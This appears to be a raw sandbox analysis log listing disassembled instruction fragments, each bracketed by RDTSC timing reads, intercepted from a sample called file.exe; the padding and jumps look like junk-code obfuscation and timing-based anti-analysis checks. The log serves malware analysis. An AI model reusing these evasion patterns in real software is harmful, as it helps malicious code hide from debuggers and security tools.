Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC220D second address: CC2211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2211 second address: CC2231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jmp 00007F1BE4ECC070h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6F33 second address: CF6F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jns 00007F1BE47673C6h 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6F45 second address: CF6F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 jnp 00007F1BE4ECC07Bh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 ja 00007F1BE4ECC066h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6F75 second address: CF6F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1BE47673CFh 0x0000000b jl 00007F1BE47673C6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6F93 second address: CF6FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F1BE4ECC066h 0x0000000a jmp 00007F1BE4ECC076h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6FB3 second address: CF6FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7255 second address: CF7288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1BE4ECC066h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F1BE4ECC06Fh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jmp 00007F1BE4ECC072h 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF73F9 second address: CF73FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF73FF second address: CF7405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7405 second address: CF7409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF77D9 second address: CF77DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF77DD second address: CF77F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F1BE47673ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F1BE47673C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF77F1 second address: CF7809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC074h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFFF30 second address: CFFF6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D1h 0x00000007 jmp 00007F1BE47673D3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F1BE47673D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0709C second address: D070BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BE4ECC06Ch 0x0000000b pop edx 0x0000000c je 00007F1BE4ECC07Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F1BE4ECC066h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D070BF second address: D070C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AA09 second address: C7AA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06905 second address: D0690A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0690A second address: D06932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1BE4ECC077h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F1BE4ECC066h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06932 second address: D06936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06936 second address: D0693A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0693A second address: D06940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06A75 second address: D06A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE4ECC074h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06A8D second address: D06A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06A91 second address: D06A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06A97 second address: D06AAA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BE47673CEh 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F1BE47673C6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06BD1 second address: D06BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1BE4ECC066h 0x0000000a jno 00007F1BE4ECC066h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06D7F second address: D06D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06D96 second address: D06D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D095E5 second address: D095FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1BE47673CFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D095FA second address: D0960B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F1BE4ECC066h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0915A second address: D09160 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09160 second address: D09166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09166 second address: D0916B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0916B second address: D09175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D092CD second address: D092D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D092D3 second address: D092D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D092D7 second address: D092DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D092DB second address: D092F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F1BE4ECC06Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D947 second address: D0D97D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F1BE47673D0h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F1BE47673CAh 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jg 00007F1BE47673C6h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DC2B second address: D0DC43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F1BE4ECC06Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DC43 second address: D0DC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DC4C second address: D0DC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1266C second address: D12674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12674 second address: D1267A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12BF7 second address: D12C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F1BE47673C8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F1BE47673C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C0C second address: D12C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F1BE4ECC066h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12D90 second address: D12D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12D96 second address: D12D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12D9A second address: D12DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1CF1 second address: CC1D5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1BE4ECC06Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F1BE4ECC068h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a jne 00007F1BE4ECC069h 0x00000030 push 00000004h 0x00000032 ja 00007F1BE4ECC06Ch 0x00000038 mov edi, dword ptr [ebp+122D3C52h] 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jnl 00007F1BE4ECC066h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1D5F second address: CC1D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1D64 second address: CC1D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC06Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1D77 second address: CC1D9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d js 00007F1BE47673CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13053 second address: D1305D instructions: 0x00000000 rdtsc 0x00000002 js 00007F1BE4ECC072h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1305D second address: D13063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D174BE second address: D174C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D174C2 second address: D174C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F6F1 second address: D1F713 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1BE4ECC06Bh 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F713 second address: D1F719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F719 second address: D1F74D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1BE4ECC066h 0x00000008 jmp 00007F1BE4ECC075h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1BE4ECC075h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1FA00 second address: D1FA20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1BE47673C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1FA20 second address: D1FA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1FA24 second address: D1FA2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2020F second address: D20213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20213 second address: D20217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20217 second address: D2022E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F1BE4ECC066h 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F1BE4ECC066h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2022E second address: D2023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F1BE47673C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2023B second address: D2028A instructions: 0x00000000 rdtsc 0x00000002 je 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F1BE4ECC066h 0x00000011 jmp 00007F1BE4ECC073h 0x00000016 je 00007F1BE4ECC066h 0x0000001c popad 0x0000001d popad 0x0000001e push edi 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push edi 0x00000023 pop edi 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F1BE4ECC078h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20579 second address: D2057D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20834 second address: D2083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20AE3 second address: D20AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29E35 second address: D29E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE4ECC06Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29E45 second address: D29E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F1BE47673C8h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29E52 second address: D29E57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A3F8 second address: D2A3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A3FC second address: D2A401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A401 second address: D2A407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A407 second address: D2A40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A40F second address: D2A417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A6DC second address: D2A6F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC078h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A6F9 second address: D2A705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1BE47673C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A852 second address: D2A875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F1BE4ECC082h 0x0000000b jmp 00007F1BE4ECC076h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C2ED second address: D2C2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C2F1 second address: D2C2F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C2F5 second address: D2C2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3597E second address: D3599A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jl 00007F1BE4ECC080h 0x0000000d jnl 00007F1BE4ECC06Ch 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33B02 second address: D33B30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1BE47673D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F1BE47673C8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F1BE47673C6h 0x00000019 jne 00007F1BE47673C6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33C9E second address: D33CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33CA3 second address: D33CC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1BE47673C6h 0x00000009 jg 00007F1BE47673C6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pushad 0x00000013 jns 00007F1BE47673C6h 0x00000019 jmp 00007F1BE47673CAh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33CC8 second address: D33CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33CD5 second address: D33CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D344EA second address: D3450C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1BE4ECC066h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F1BE4ECC071h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D348FE second address: D34918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1BE47673D3h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34918 second address: D34939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnp 00007F1BE4ECC066h 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 jno 00007F1BE4ECC06Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B159 second address: D3B15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
